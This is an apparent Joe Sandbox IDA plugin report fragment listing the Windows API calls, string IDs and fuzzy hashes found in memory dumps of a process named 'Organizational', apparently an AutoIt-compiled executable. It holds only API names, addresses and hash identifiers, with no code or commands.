                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                    • String ID:
                                                    • API String ID: 292994002-0
                                                    • Opcode ID: 129245520c99a01a5f1b9c4840f9ea55ae3d87dbbbe1e158a393b2e564467c3b
                                                    • Instruction ID: 06d3b13c8b6ef36f02c5603a234bef1378f2d2d6b76ce81587a4f03db76a952a
                                                    • Opcode Fuzzy Hash: 129245520c99a01a5f1b9c4840f9ea55ae3d87dbbbe1e158a393b2e564467c3b
                                                    • Instruction Fuzzy Hash: 25110872700A159FF7111F269C84A7E7BA8EF84B30B44813AF909D7241DFB4D9019BA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: 4293ea8fc6b1d44deca757e9cde963f3f4844b230f5efc8e1b32f5ed27f17560
                                                    • Instruction ID: 373c6dc5de59c5a3e6e7ee6e950d495b5c75937388c8ead47f675676c8950161
                                                    • Opcode Fuzzy Hash: 4293ea8fc6b1d44deca757e9cde963f3f4844b230f5efc8e1b32f5ed27f17560
                                                    • Instruction Fuzzy Hash: 29D012F3858108EAC74C9B90CC54FFA777CAB04320F100053F546A2040DA358788BB26
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F61ED6,00000000), ref: 00F62AAD
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F62AE4
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: f88360e3edc585e28ae6fef8c6369399d4eb2aa794e442ec9a2247c283a8d5f0
                                                    • Instruction ID: a6fba75b90dee4d14aa351b91984d4e691f905aba7b1dde01bc4d8e565b140e0
                                                    • Opcode Fuzzy Hash: f88360e3edc585e28ae6fef8c6369399d4eb2aa794e442ec9a2247c283a8d5f0
                                                    • Instruction Fuzzy Hash: FA41A772A00A09BFEB60DE94CC85FBB77BCEB80764F10405AF605A6141DAB59E41B760
                                                    APIs
                                                      • Part of subcall function 00F10FE6: std::exception::exception.LIBCMT ref: 00F1101C
                                                      • Part of subcall function 00F10FE6: __CxxThrowException@8.LIBCMT ref: 00F11031
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F493E3
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F49410
                                                    • GetLastError.KERNEL32 ref: 00F4941D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: 764404b24d618deadfbe37b058fb659d6bfe972fe4434bd89cc09eb7b3a896e3
                                                    • Instruction ID: 52d752b71e36f70c1b4496909bf4d015ed088cf3becd03388929acab788cf663
                                                    • Opcode Fuzzy Hash: 764404b24d618deadfbe37b058fb659d6bfe972fe4434bd89cc09eb7b3a896e3
                                                    • Instruction Fuzzy Hash: 1A1191B2918209AFD728DF54DC86D7BBBBCFB48710B21852EF45993250EB70AC41DB60
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F542FF
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00F5433C
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F54345
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 3aef9786f17a9eaf278cb018d653ab22b61043774a18faafe7893dd46e1b5e58
                                                    • Instruction ID: 7bb5109e1ea068e23f43e10dcfeb3f3f7cf607c69c58123ae908b85079d1e77b
                                                    • Opcode Fuzzy Hash: 3aef9786f17a9eaf278cb018d653ab22b61043774a18faafe7893dd46e1b5e58
                                                    • Instruction Fuzzy Hash: 121173B2D00229BAE7109BA89C44FFEB7ACEB08725F100156BE14E7190C274594497A1
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F54F45
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F54F5C
                                                    • FreeSid.ADVAPI32(?), ref: 00F54F6C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 5af34c3ce8e29f07378f974e08dc43b16e4580d8ad693692a75e8bf12a8eed75
                                                    • Instruction ID: 045990ead92e203c1f554c2391c661d6077900827848aac816c4d8b6bdfbb646
                                                    • Opcode Fuzzy Hash: 5af34c3ce8e29f07378f974e08dc43b16e4580d8ad693692a75e8bf12a8eed75
                                                    • Instruction Fuzzy Hash: 8CF04975A1130CBFDF00DFE4DC89AFEBBBCEF08211F4044A9AA01E2580E7346A489B50
                                                    APIs
                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F51B01
                                                    • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00F51B14
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: InputSendkeybd_event
                                                    • String ID:
                                                    • API String ID: 3536248340-0
                                                    • Opcode ID: 47a4d956b098c71c4cfc69a920ed0a3a167cced5602ccea1a8d45e7dc672519f
                                                    • Instruction ID: 70f602b16aae6142c537a12c625b653ab8363381a408a6a8e0918b9f2946a042
                                                    • Opcode Fuzzy Hash: 47a4d956b098c71c4cfc69a920ed0a3a167cced5602ccea1a8d45e7dc672519f
                                                    • Instruction Fuzzy Hash: 37F0497190020DABDB00CF94C805BFE7BB4FF04316F40804AFD559A292D7799619EFA4
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00F69B52,?,00F8098C,?), ref: 00F5A6DA
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00F69B52,?,00F8098C,?), ref: 00F5A6EC
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 23e7800d53fc91330be38007125ec0c4385677b0915df9836a3e5d52dbcd53a1
                                                    • Instruction ID: e04e667167dccd0ae650d5fe115820292d05fde78fd7dcc4912c4848b83b386e
                                                    • Opcode Fuzzy Hash: 23e7800d53fc91330be38007125ec0c4385677b0915df9836a3e5d52dbcd53a1
                                                    • Instruction Fuzzy Hash: 01F0A73650422DBBDB20AFA4DC48FEB776CFF09361F008255B908D6191DA709954EBE1
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F48F27), ref: 00F48DFE
                                                    • CloseHandle.KERNEL32(?,?,00F48F27), ref: 00F48E10
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 4ca07cc68fd11e1de3e37aca01059eda5e33514dc110630a277173d9724012ac
                                                    • Instruction ID: 16b6e6016b49dc184ee42d13a7071ba7cb93dcf25249e0ecf4ff47856c00af65
                                                    • Opcode Fuzzy Hash: 4ca07cc68fd11e1de3e37aca01059eda5e33514dc110630a277173d9724012ac
                                                    • Instruction Fuzzy Hash: B1E0E675410610EFE7652B50EC09DB77BADFF04350714891DF55580470DB619CD0EB50
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F18F87,?,?,?,00000001), ref: 00F1A38A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F1A393
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 41f1cf2f590d55c55e1fa351f1b8d9cf5959bb697da713cffab27f67dd4beba8
                                                    • Instruction ID: 81e6ce72844770f73cfdbb6fd31ff8d23982632f73fab380b2bb5f27655c659e
                                                    • Opcode Fuzzy Hash: 41f1cf2f590d55c55e1fa351f1b8d9cf5959bb697da713cffab27f67dd4beba8
                                                    • Instruction Fuzzy Hash: ADB0923106430CABCA802B91EC0DBE83F68EB46A62F804010F60D44060CF625454AB91
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00F645F0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 8eaa140c34e5de8967aa514d55cb54a8ec68fb8892b06aaa0fd3d188d94a5463
                                                    • Instruction ID: f14e5162d0b5393f7ceec4c5d06156b02e24f3a1ed654612635868fe5b5deeb0
                                                    • Opcode Fuzzy Hash: 8eaa140c34e5de8967aa514d55cb54a8ec68fb8892b06aaa0fd3d188d94a5463
                                                    • Instruction Fuzzy Hash: C9E09A322002099FC300AF59E800AAAB7E8AF94760B048426FE0AD7351DE70BC008B90
                                                    APIs
                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00F55205
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: b3face72ba18ae46e7f59e46f7a2020840a26a4a6a427ce0a83f3f42afb6ff13
                                                    • Instruction ID: 133ba2492a3bd50e268c5875f448254e3fc6ea9223f0c07b6bc070e04c7d5681
                                                    • Opcode Fuzzy Hash: b3face72ba18ae46e7f59e46f7a2020840a26a4a6a427ce0a83f3f42afb6ff13
                                                    • Instruction Fuzzy Hash: 68D09EA5560E0979ED5807249E3FF761E08EB01FD3FD445497B42890C1EDD4D84DB5B1
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F48FA7), ref: 00F49389
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: e9ecde1b4bdfed0c36425d1951256f5045ec154b1f3b312ae83d85c89830be63
                                                    • Instruction ID: 036cdc6199a8937748baba22a9bec8f8651b4019a61c74468212ad4371726165
                                                    • Opcode Fuzzy Hash: e9ecde1b4bdfed0c36425d1951256f5045ec154b1f3b312ae83d85c89830be63
                                                    • Instruction Fuzzy Hash: 82D05E3326050EABEF018EA4DC01EFE3B69EB04B01F808111FE15D50A0C775D835AB60
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00F30734
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 9485a976e2b6d6bdb25867caaa8bcac252c192e5d37c0884fd2680b2359a9e4d
                                                    • Instruction ID: 4469263ab9553f62526da37a4a28b3dd4fa47e260a25d5410225270674f9f560
                                                    • Opcode Fuzzy Hash: 9485a976e2b6d6bdb25867caaa8bcac252c192e5d37c0884fd2680b2359a9e4d
                                                    • Instruction Fuzzy Hash: D7C04CF280010DDBCB05DBA0D998EFF77BCAB04314F100056A105B2110DB749B449B71
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F1A35A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 3c3bc44b683b492b98b70dba1a0252f682c496cc1a11b74c7181ec7cf59a42c1
                                                    • Instruction ID: e5acb606fa27592de41527aaf53a9a71027b3fa3ac8dc031e9ada9263c7e0090
                                                    • Opcode Fuzzy Hash: 3c3bc44b683b492b98b70dba1a0252f682c496cc1a11b74c7181ec7cf59a42c1
                                                    • Instruction Fuzzy Hash: 54A0113002020CAB8A002B82EC088A8BFACEA022A0B808020F80C000228B32A820AA80
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,00F80980), ref: 00F73C65
                                                    • IsWindowVisible.USER32(?), ref: 00F73C89
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: 73bd24b54c979a01708d5c64b206f2a3872a3d4a2ce39cade01c004e3970361f
                                                    • Instruction ID: dbdd7924a2748c04f941d7778c7a7489d6494a60ce3afdda9d52ab8b07ca5f4a
                                                    • Opcode Fuzzy Hash: 73bd24b54c979a01708d5c64b206f2a3872a3d4a2ce39cade01c004e3970361f
                                                    • Instruction Fuzzy Hash: 3CD1A170204205DBCB14EF10C851AAEBBE1AF95354F108459F95A5B2E3CF75EE4AFB82
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 00F7AC55
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F7AC86
                                                    • GetSysColor.USER32(0000000F), ref: 00F7AC92
                                                    • SetBkColor.GDI32(?,000000FF), ref: 00F7ACAC
                                                    • SelectObject.GDI32(?,?), ref: 00F7ACBB
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F7ACE6
                                                    • GetSysColor.USER32(00000010), ref: 00F7ACEE
                                                    • CreateSolidBrush.GDI32(00000000), ref: 00F7ACF5
                                                    • FrameRect.USER32(?,?,00000000), ref: 00F7AD04
                                                    • DeleteObject.GDI32(00000000), ref: 00F7AD0B
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F7AD56
                                                    • FillRect.USER32(?,?,?), ref: 00F7AD88
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F7ADB3
                                                      • Part of subcall function 00F7AF18: GetSysColor.USER32(00000012), ref: 00F7AF51
                                                      • Part of subcall function 00F7AF18: SetTextColor.GDI32(?,?), ref: 00F7AF55
                                                      • Part of subcall function 00F7AF18: GetSysColorBrush.USER32(0000000F), ref: 00F7AF6B
                                                      • Part of subcall function 00F7AF18: GetSysColor.USER32(0000000F), ref: 00F7AF76
                                                      • Part of subcall function 00F7AF18: GetSysColor.USER32(00000011), ref: 00F7AF93
                                                      • Part of subcall function 00F7AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F7AFA1
                                                      • Part of subcall function 00F7AF18: SelectObject.GDI32(?,00000000), ref: 00F7AFB2
                                                      • Part of subcall function 00F7AF18: SetBkColor.GDI32(?,00000000), ref: 00F7AFBB
                                                      • Part of subcall function 00F7AF18: SelectObject.GDI32(?,?), ref: 00F7AFC8
                                                      • Part of subcall function 00F7AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00F7AFE7
                                                      • Part of subcall function 00F7AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F7AFFE
                                                      • Part of subcall function 00F7AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00F7B013
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                    • String ID:
                                                    • API String ID: 4124339563-0
                                                    • Opcode ID: 303d126beee475d2b40e222042536e705cb7077af3a05917908440e2f5dd724b
                                                    • Instruction ID: e3ceaa77f535f148c0488bcaa5060e3a4450076d431cf0768b8c6f582dd6f5d6
                                                    • Opcode Fuzzy Hash: 303d126beee475d2b40e222042536e705cb7077af3a05917908440e2f5dd724b
                                                    • Instruction Fuzzy Hash: 8FA1BC72408305BFD7519F64DC08AAF7BA9FF88331F544A1AF966961A0DB30D848EF52
